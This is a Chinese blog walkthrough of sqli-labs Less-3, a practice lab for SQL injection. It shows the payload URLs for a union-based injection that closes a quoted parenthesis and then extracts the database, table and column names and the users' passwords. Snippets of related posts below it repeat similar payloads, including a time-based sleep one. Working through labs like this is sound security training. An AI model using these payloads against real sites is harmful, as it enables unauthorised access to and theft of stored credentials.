sqllab第三关

最新推荐文章于 2024-03-13 02:10:40 发布
最新推荐文章于 2024-03-13 02:10:40 发布
阅读量199 收藏
点赞数
分类专栏: sqllab 文章标签: mysql sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/aliexiansheng/article/details/110532541
版权

基于报错-单引号和括号

访问本关页面
在这里插入图片描述

一、判断注入

http://127.0.0.1/sqllab/Less-3/?id=1'

在这里插入图片描述
这里可以看到出现报错信息,可以看到比原先的 ?id=1'多了')。可以判断出注入语句大致为:

select * from 表 where id = ('id') LIMIT 0,1

构造payload:

http://127.0.0.1/sqllab/Less-3/?id=1') --+

在这里插入图片描述正常回显,证明判断基本没错。

判断回显

http://127.0.0.1/sqllab/Less-3/?id=1') and 1 = 2 union select 1,2,3 --

在这里插入图片描述

查询当前数据库名称

http://127.0.0.1/sqllab/Less-3/?id=1') and 1 = 2 union select 1,database(),3 --

在这里插入图片描述当前数据库名称为security。

查询表名称

http://127.0.0.1/sqllab/Less-3/?id=1') and 1 = 2 union select 1,(select group_concat(table_name) from information_schema.tables where table_schema= 'security'),3 --

在这里插入图片描述

查询列名

http://127.0.0.1/sqllab/Less-3/?id=1') and 1 = 2 union select 1,(select group_concat(column_name) from information_schema.columns where table_name= 'users'),3 --

在这里插入图片描述

查询字段值

http://127.0.0.1/sqllab/Less-3/?id=1') and 1 = 2 union select 1,(select group_concat(concat_ws(0x3a,id,username,password)) from users),3 --

在这里插入图片描述

sera__
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sqli-labs系列——第三
1匹黑马
04-26 4669
文章目录判断注入类型开始注入后记 判断注入类型 这第三有点意思,是一个带括号的数字型注入,这里需要闭合它的括号,之前遇到过很多这样的站,它的sql语句一般都是这样的: $sql = select * from user where id=('$id'); 看一下输入’后的信息,能够判断出这是一个数字型注入: 此时的sql语句应为: select * from user where id=('1...
sqllab第三解析
Deeeelete的博客
12-09 462
直接查看字段 成功报错,为了看的清楚一点,用id=-1’查看 报错的内容是”-1”)等等,这里出现了一个),而且从图中看出,-1被两队引号包围,形成了一个完整的闭合,说明加单引号无误,错误出在),那意思是我们需要闭合),那是用(闭合吗? 并不是,在未注入之前的数据库语言应该是完整而正确的,这就是说语言中不可能只有一个)孤零零出现,前面依然有一个(了,但这个它不爆出所以不显示,我们要继续用)将...
Sqli-libs通详解__第三
henghengzhao_的博客
10-06 627
sqli-libs通详解,一看就会,超详细
sql-labs前三
weixin_51536807的博客
02-09 461
第一 根据题目注入id=1,回显正常。 判断注入类型 在上面 ?id=1 之后再加上 and 1=1 回显正常,修改 and 1=1 为 and 1=2 没有出现报错,所以不是数值查询。 在id后加上 ’ 再次验证 出现报错,猜测为字符型注入,再加上 --+注释掉最后面的单引号试试。 没有再报错,所以根据以上确定为字符型注入。 原因: 先假设后台的SQL语句为数字型。即后台的SQL语句为 select * from table where id = 注入id的值 我们刚开始在 ?id=1 之
sqli-labs第三
TA不懒,但还没有添加简介
09-07 759
文章目录总结 第三找到注入点的时候发现会发现在"1"处右边多了个右括号 构造一下sql语句 select 1,2,3 from table where id=('$id') 所以需要在1’后面增加一个")" 然后使用order by 或者select 判断字段个数 然后和第一第二一样 第一二详细 总结 和前两不同的是注入点有所改变,需要思考并构造语句。 ...
SQLLab51:实验5
03-21
在本实验"SQLLab51:实验5"中,我们将深入探讨SQL(结构化查询语言)的应用,特别是在数据管理和分析中的重要性。SQL是数据库管理的核心工具,它允许用户创建、查询、更新和管理系型数据库。在这个实验中,虽然标签...
SQLLab5:从node.js连接到mysql
03-08
在IT行业中,数据库管理和数据操作是至重要的技能,尤其是在Web开发领域。`SQLLab5:从node.js连接到mysql`这个主题聚焦于如何利用JavaScript的Node.js环境与MySQL数据库进行交互。Node.js以其异步非阻塞I/O模型和...
SQL-lab:sql注入全部解析
04-17
看看有哪几列可以回显在这里我输入了六列进行联合查询,但是显示没有六列,那么就截一半根据回显,我们发现,第二列和第三列是可以回显的现在我们就可以查到我们想要的内容查询数据库版本和库名称-1' union select 1...
sqli-labs.zip
12-31
3. **防御策略**:课程可能涵盖如何使用预编译语句(如PHP的PDO或MySQL的PreparedStatement)、输入验证、参数化查询等来防止SQL注入。 4. **Web应用安全**:理解HTTP请求,学会分析GET和POST数据,以及如何通过URL...
sql-linux-lab:在 Linux 上开始使用 MS SQL Server 的脚本和文档-开源
06-29
在 IT 领域,尤其是数据库管理中,Microsoft SQL Server 是一个广泛使用的数据库管理系统,尤其在 Windows 操作系统上。然而,随着 Linux 平台的日益普及,SQL Server 也开始支持 Linux 平台,为用户提供跨平台的...
sqli-labs-master之第三
weixin_66387649的博客
02-28 529
sqli-labs-master第三详解
SQLI-lab靶场第三+报错注入练习
huixing2022的博客
05-14 472
剩下的操作和less-1和less-2一样 表名应该也是emails,referers,uagents,users 顺便练习使用报错注入: 常用三大函数:updatexml() extractvalue() floor 使用函数报错获取信息:select、insert 、update、delete extractvalue(arg1,arg2) 是 mysql对xml文档数据进行查询和修改的XPATH函数 arg1:xml文档 ar...
SQL注入sqli-labs第三(less-3)
s_xcx_ah的博客
06-10 2232
sqli第三简要步骤
sqllab第三笔记
最新发布
I_WORM的博客
03-13 523
发现报错提示中出现了‘)’;说明构造的语句中带有括号信息;同时说明了这是单引号引起的字符型注入。构造payload:id=0') union select 1,2,3 --+成功显示除了输入的内容;下面可以用同样的方法获取数据库等信息。首先通过测试判断存在什么类型的sql注入。说明是字符型的sql注入。好了,下面就测试有什么限制条件。好了,尝试进行联合注入。
sql-labs闯1-10
ljlrookiebird的博客
04-11 535
原理跟第一相同,单引号报错但是后面加注释又没办法使语句闭合,猜了半天是需要单引号和右括号才能使语句闭合,后台语句为select * from xxx where id=( '1' ) ,我们注入后的语句为:select * from xxx where id = (‘-1’)union select 1,2,database() --+ ')id=1' and if((length(database())>8),sleep(10),0) --+,页面十秒后加载。
【详细】 Sqli-labs1~65详解 解题思路+解题步骤+解析
Jay17的博客
08-03 3万+
【详细】 Sqli-labs1~65详解 解题思路+解题步骤+解析 详细,超级详细
详细sqli-labs(1-65)通讲解
热门推荐
dreamthe的博客
05-17 14万+
​ 如果刚开始接触sql注入,那么sqli-labs这个靶场会很适合你,里面包含了很多的情景,以及我们在sql注入的时候遇到的阻碍。本章将1-65重点卡进行详细讲解。代码基本上很全。如果靶场练习完了可以看我这篇SQL注入总结会更好掌握。​SQL注入非常详细总结_糊涂是福yyyy的博客-CSDN博客_sql注入数据包 ​...
sqli-labs闯指南 1—10
18年3月萌新白帽子
06-18 5万+
如果你是使用的phpstudy,请务必将sql的版本调到5.5以上,因为这样你的数据库内才会有information_schema数据库,方便进行实验测试。另外-- (这里有一个空格,--空格)在SQL内表示注释,但在URL中,如果在最后加上-- ,浏览器在发送请求的时候会把URL末尾的空格舍去,所以我们用--+代替-- ,原因是+在URL被URL编码后会变成空格。第一1.经过语句and 1=2...
sqli-lab教程——1-35通Writeup
地址ch3nye.top
09-11 10万+
刚做sqli-lab的时候,我逛了几个博客论坛没找到什么特别完整的教程,在这里写一篇更完整的教程。 本教程中使用到的大部分函数可以在我的 sql注入入门必备基础知识中找到具体说明和使用方法。 一些术语使用错误请见谅。 一些题目有多种方法,本人也是在学习当中,我会尽可能补全,但是精力有限,文章不尽完美,请见谅。 目录 Page-1(Basic Challenges) Less-1 ...
sqllab连接数据库
09-27
通过使用不同的引用内容,我能够回答于SQL连接数据库的问题。根据引用中的信息,连接到SQL数据库需要以下步骤: 1. 创建连接对象: - 对于SQL数据库,使用`SqlConnection`类创建连接对象。 - 对于ACCESS数据库,使用`OleDbConnection`类创建连接对象。 2. 设置连接字符串: - 对于SQL数据库,使用`连接对象名称.ConnectionString`属性设置连接字符串,其中包括服务器名、用户名、密码和数据库名称等信息。 - 对于ACCESS数据库,使用`连接对象名称.ConnectionString`属性设置连接字符串,其中包括数据库路径等信息。 3. 打开连接:使用`连接名称.Open()`方法打开连接。 4. 创建命令对象: - 对于SQL数据库,使用`SqlCommand`类创建命令对象。 - 对于ACCESS数据库,使用`OleDbCommand`类创建命令对象。 5. 设置连接属性:使用`命令对象名称.Connection`属性将命令对象与连接对象联起来。 6. 设置命令文本:使用`命令对象名称.CommandText`属性设置SQL语句。 7. 执行命令:使用`命令对象名称.ExecuteNonQuery()`方法执行SQL命令。 8. 闭连接:使用`连接对象名称.Close()`方法闭连接。 基于以上的步骤,您可以使用适当的连接对象和命令对象来连接到SQL数据库并执行相操作。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值